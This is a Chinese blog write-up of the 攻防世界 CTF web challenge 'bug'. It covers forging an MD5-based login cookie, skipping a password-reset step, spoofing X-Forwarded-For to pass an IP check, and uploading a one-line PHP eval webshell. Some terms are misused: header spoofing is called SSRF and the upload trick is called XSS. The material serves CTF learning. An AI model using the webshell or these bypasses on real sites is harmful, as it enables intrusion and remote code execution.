攻防世界:web Bug

最新推荐文章于 2024-06-01 16:50:01 发布
最新推荐文章于 2024-06-01 16:50:01 发布
阅读量1k 收藏 4
点赞数 3
文章标签: 安全 信息安全 xss cms csv
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ZripenYe/article/details/120793606
版权
目录

靶场分析

这道题涉及到解密我是没有想到的
拿到手,是一个登录界面:image
拿扫描器扫描,发现没有其他的文件

分析可能存在的漏洞:

  • SQL注入漏洞
  • SQL二次注入漏洞
  • 其他逻辑漏洞

经过尝试,前两个漏洞都没有,只有可能是最后一个漏洞了

登录admin

我们登录一个账户进去,点击manager,发现弹窗提示:image
猜想管理员的账号是admin,回到注册界面,注册一个admin账号:image
显示admin已经被注册,所以现在的目标就是想办法登录进admin的账号
回到登录面板,我们多注册几个账号并登录,抓包观察:imageimage
发现每次登录都会返回一个user的cookie,而且多次登录同一个账户,返回的cookie值是一样的。
而且观察到,这个字符串的位数是32位,猜想很有可能是md5加密
说明:这个userCookie的生成是有规律的MD5加密
看网上的答案是MD5(UID:username)的加密方法。
使用这种加密方法即可随意登录一个账户,然后点击personal,这样就可以看见他的信息了imageimage

但是网上的另一个大佬的方法是:image
绕过了第一步的找回密码认证,直接来到第二步,操作是:

  • 修改了URL上的step=1为2
  • 修改了Referer头

确实,牛啊牛

伪造IP

如愿登录admin之后打开manager,发现它对IP做了 加固image
但是我们有办法,这就是使用X-Forwarded-For:127.0.0.1实现SSRF注入
在报文里面加上这个,然后实行image
就可以看到还是没有flagimage
这个时候一般点下检查还是会有提示的:image
这个提示我们需要完成一些操作
看见filemanager,估计就是文件上传image
果然upload是有用的,但是里面也说了,只能是图片文件
上传一个PHP图片,有Content-Type来进行甄别的,那就改动这个为image/gif
为了保险起见,文件名也改一改imageimage
没用,怕不是对文件内容做了过滤
最后经过测试,如下的改动可以回显出flagimageimage

<script language="php"> alert(@eval($_POST['cmd']))</script>

总结

  • 不要总想着解密,md5不配凡人猜出来
  • 第一步过不去可以尝试第二步,记得把referer改成第一步的URL,然后把表示第一步的变量改成第二步的变量,比如step=1改成step=2
  • IP出现问题直接上X-forwarded-For: 127.0.0.1
  • 文件上传漏洞,直接该Content-Type和文件名外,可能还对内容做了过滤,这个时候就需要变通为XSS注入了
  • 这道题考了,逻辑漏洞、身份验证漏洞、文件上传漏洞、XSS漏洞、SSRF漏洞
Zeker62
关注
  • 3
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
攻防世界web进阶区bug
gongjingege的博客
08-07 227
打开靶场,出现登录框,SQL注入无果,老老实实注册 注册成功,登录 点击manage,显示要admin管理员 考虑在findpwd里先修改自己的账号,bp抓包,改掉admin的密码 bp抓包 username改成admin,密码随便 可以看到修改成功 管理员新密码登录 再次点击manage emmmm继续改 bp抓包,X-Forwarded-For:127.0.0.1 这个时候从源代码里看到,又给了个新的路径,do=??? filename想到增删改查,多试几次,是upload 上传文件,是一句话
黑客攻防技术宝典:Web实战篇(第2版)1
08-03
《黑客攻防技术宝典:Web实战篇(第2版)》是一本专注于Web应用程序安全的实战指南,由Dafydd Stuttard和Marcus Pinto撰写,由石华耀和傅志红翻译。该书深入浅出地探讨了Web应用程序的安全风险和攻防策略,适合网络...
攻防世界Webbug
Light_inthe_eyes的博客
10-17 183
进入页面后,发现是一个登录窗口,还有注册以及找回密码的操作,先注册一个账户登录,发现进去后是一个欢迎笑脸: 点击Manage,弹窗我不是admin,意味着思路就是我们可以想办法登录admin拿到更高权限。 再看看personal,发现是每一个账户的信息,注意到UID为5,说明账户中本来就有四个账号,除了admin,其他的用户名和密码都不知道 changePwd和Logout中没有什么可搜寻的线索 用bupsuite抓包Manage,发现cookie中的user参数,经过测试是5:ding经过MD5加密后
攻防世界-WEB-filemanager
最新发布
m0_52061428的博客
06-01 925
人道是,我心错付情深处,以为两情皆如初。奈何春风扶柳意,独我梦中空自舞。许久未见诸位,这段时间由于学业与其他事情,便没再继续写下去(其实很大一部分归咎于自己的懒惰//DOGE)这次带来一道开胃小菜,希望能够帮到各位师傅们,也希望得到大家的指点。
攻防世界-WEB进阶区-bug
qq_64966153的博客
07-04 1084
攻防世界 bug靶场
攻防世界WEB】难度五星15分进阶题:bug
07-23 469
攻防世界WEB】五星15分
【愚公系列】2023年06月 攻防世界-Webbug
时光隧道
06-15 4450
越权渗透是指黑客利用系统漏洞或者密码破解等手段,未经授权地进入目标系统获得权限。具体而言,越权渗透可以包括以下几种形式:弱口令攻击:黑客通过暴力破解或者社工攻击等手段获取系统账号和密码,从而进入目标系统。缓冲区溢出攻击:黑客利用系统中存在的缓冲区溢出漏洞,向目标系统注入恶意代码,从而获得系统权限。SQL注入攻击:黑客利用目标系统中存在的SQL注入漏洞,通过注入恶意SQL语句获取系统权限。基本流程案例如下:收集信息:黑客先通过信息搜集技术,获取目标系统的基本信息,包括IP地址、端口、服务等。
攻防世界bug
wangzhemvp的博客
04-14 577
抓包修改后缀为 “php5”,Content-Type 为 “image/jpeg”,并在 post 数据中将 PHP 一句话木马改为用 JavaScript 表示。4. 利用JavaScript执行php代码(正常的php代码会被检测到,所以就用JavaScript来执行)在muma.php里写一句话木马,发现系统能认出这是php文件,说明开启了内容的检测(存在。3. 等价替换(php5,php3)Content-Type 判断。文件内容过滤 PHP 的语法。
攻防世界:适合作为桌面
10-08
标题“攻防世界:适合作为桌面”暗示了一个与网络安全相关的主题,可能是一个模拟实战的平台或游戏,其中用户可以通过解决各种安全问题来提升自己的技能。描述中的“misc”通常代表“miscellaneous”(杂项),表明...
攻防世界Wire1杂项
11-20
攻防世界Wire1杂项,misc。 此题详细解题博客:https://danbaku.blog.csdn.net/article/details/127951997
攻防世界流量分析2杂项
11-20
攻防世界流量分析2杂项,misc。 此题详细解题博客:https://danbaku.blog.csdn.net/article/details/127953659
攻防世界:阳间题的实战解析与策略.zip
05-13
总之,攻防世界竞赛是一个充满挑战和机遇的舞台。只要你热爱网络安全、愿意付出努力和时间、不断学习和实践,你一定能够在这个舞台上展现出自己的才华和实力。
攻防世界----bug
qq_44418229的博客
08-03 1047
攻防世界----bug 知识点1:逻辑漏洞--垂直越权 知识点2:文件上传---利用JavaScript执行php代码
攻防世界 BUG 题 WP
qq_43622442的博客
03-06 485
攻防世界 BUG 题 WP 1.打开链接,只是一个简单的登录框: 2.测试弱口令和万能密码失败,尝试二次注入,发现单引号被转义了: 3.那我先用自己创建的号进去看一下有些什么: 4.这个manage需要管理员才能点,然后看到personal那里可以看一些个人信息,还有个uid,看看有没有越权,然而并没有= = 5.突然想起来超级好用的找回密码功能我还没测试= =先用自己创建的号跑一遍流程,发...
攻防世界 web 进阶 bug
weixin_42499640的博客
08-08 2287
打开题目 注册一个账号 登陆上去 点击 manage选项卡 提示不是admin进不去 那就用admin进 点击找回密码 输入刚刚注册的账号信息 进入修改密码页面 设置代理 打开burpsuite 点击拦截 页面里设置新密码 提交 bp拦截到包 username参数修改成admin 放包 修改成功 现在admin账户的密码被修改为我们自己设置的密码 使用admin帐户登陆 但ip不对 简单 那...
攻防世界 WEB bug
qq_41696858的博客
08-26 314
这题又是登录注册找回密码的,很像sql注入,但是注了半天也没注出来,好吧,是思路单一了 这题的关键点其实在找回密码页面,他所要求的信息有三个:用户名:admin,出生年月日和地址 其实注册登录之后发现在personnel页面是显示这个信息的,于是就尝试是否存在水平越权 emmmm。。。是存在的,burpsuite抓包,cookie里有个md5值,经过检验是uid:用户名的md5值 同时url里面的uid也要改为1,这样就成功得到了更改admin密码的三个信息,注销,登录admin账号,点击manage,显示
攻防世界-Web进阶区-bug
feng的博客
09-14 551
前言 这题主要涉及了各种绕过,也需要一点点的脑洞或者fuzz,这题还是比较好的。 WP
攻防世界-bug
读万卷书,行万里路。
12-27 1751
文章目录1 越权改密码2 X-Forward-For绕过IP检测3 文件上传绕过 1 越权改密码 大概熟悉一下整个网站的功能。 注册 找回密码 登陆 查询个人信息 测试注册功能。我使用SQLmap测试是否有SQL注入,发现并没有找到注入。注册点可能会有二次注入,使用SQLmap测不出来就尝试下一个点。 测试找回密码功能。首先是将用户信息进行输入,然后输入新密码。查看源码能看见当前正在找回的用户名1 填入新密码后,HTTP请求头会同时发送用户名和密码。如果系统用此时的用户名来修改密码,那就可以进行越权操
xctf攻防世界 Web高手进阶区 bug
l8947943的博客
01-02 1057
1. 进入环境,查看内容 我们先注册一个玩玩,然后登录如图: 一个个点一遍,发现manage有问题,如图: 明白了,暗示我们需要拿到admin权限,然后再搞事情 2. 开始分析 如何拿到admin?在用户页面发现有个change pwd,如图: 我们抓包试试,看看内容,发现并没有提供有效的修改user信息,如图: 也就是默认这个页面锁定了登录用户,不允许修改user的用户名,于是继续尝试 我们发现主页还有个Findpwd 填写完响应的信息后,如图: 点击reset抓包,看看内容:
攻防世界web fileclude
07-27
攻防世界中的文件包含漏洞(File Inclusion Vulnerability)是一种常见的web安全漏洞。它主要出现在web应用程序中,当应用程序动态包含用户可控制的文件时,如果没有正确过滤和验证用户输入,攻击者可以利用这个漏洞执行恶意代码或读取敏感文件。 文件包含漏洞分为本地文件包含(Local File Inclusion,LFI)和远程文件包含(Remote File Inclusion,RFI)两种类型。LFI漏洞发生在应用程序尝试包含本地文件时,而RFI漏洞则允许攻击者通过远程服务器包含外部文件。 为了防止文件包含漏洞,开发人员应该遵循以下最佳实践: 1. 永远不要信任用户输入。对用户提供的文件名、路径或URL进行严格的输入验证和过滤。 2. 使用白名单机制限制可包含的文件范围。只允许应用程序包含预定义的合法文件,而不是用户可控制的任意文件。 3. 避免使用动态包含,尽量使用静态包含。如果必须使用动态包含,确保只包含可信任的文件。 4. 对于本地文件包含漏洞,限制访问文件系统的权限。确保应用程序只能访问必要的文件,并将敏感文件放在可访问性受限的目录下。 5. 对于远程文件包含漏洞,禁止从远程服务器包含文件,或者使用安全的方法验证和限制远程文件的来源。 6. 定期更新和修补应用程序的漏洞,以确保及时修复已知的文件包含漏洞和其他安全问题。 这些是一些常见的防范文件包含漏洞的方法,但在实际开发过程中,还需要根据具体情况采取其他安全措施来保护应用程序免受攻击。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Zeker62

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值